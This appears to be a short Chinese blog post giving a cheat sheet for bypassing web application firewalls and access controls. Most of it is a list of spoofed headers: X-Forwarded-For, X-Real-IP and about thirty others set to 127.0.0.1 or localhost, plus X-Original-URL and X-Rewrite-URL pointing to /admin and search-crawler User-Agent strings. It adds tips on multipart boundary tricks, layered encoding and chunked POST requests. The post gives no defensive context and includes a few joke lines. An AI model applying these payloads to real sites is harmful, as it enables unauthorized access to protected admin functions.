waf识别绕过

对手李彦宏Client-IP: 127.0.0.1Forwarded-For-Ip: 127.0.0.1Forwarded-For: 127.0.0.1Forwarded-For: localhostForwarded: 127.0.0.1Forwarded: localhostTrue-Client-IP: 127.0.0.1X-Client-I...


对手李彦宏
Client-IP: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For: localhost
Forwarded: 127.0.0.1
Forwarded: localhost
True-Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forward: 127.0.0.1
X-Forward: localhost
X-Forwarded-By: 127.0.0.1
X-Forwarded-By: localhost
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For-Original: localhost
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: localhost
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Server: localhost
X-Forwarded: 127.0.0.1
X-Forwarded: localhost
X-Forwared-Host: 127.0.0.1
X-Forwared-Host: localhost
X-Host: 127.0.0.1
X-Host: localhost
X-HTTP-Host-Override: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-Addr: localhost
X-Remote-IP: 127.0.0.1
自己人不要开q
X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
Referer: /admin
I'm admin
User-Agent:Googlebot
User-Agent:Bingbot
I'm svip
Content-Type: multipart/form-data; boundary=json
Content-Disposition: form-data; name="jk.pdf"
协议欺骗/异常放行
https://dencode.com/en/
各种转码,探测waf解码次数得出转码次数
post请求分段传输
https://waf-bypass.com/

  • 发表于 2021-05-01 06:13
  • 阅读 ( 172 )
  • 分类:互联网

0 条评论

请先 登录 后评论
云哥w部
云哥w部

707 篇文章

你可能感兴趣的文章

相关问题

网站首页 最近更新 点击排行 热门推荐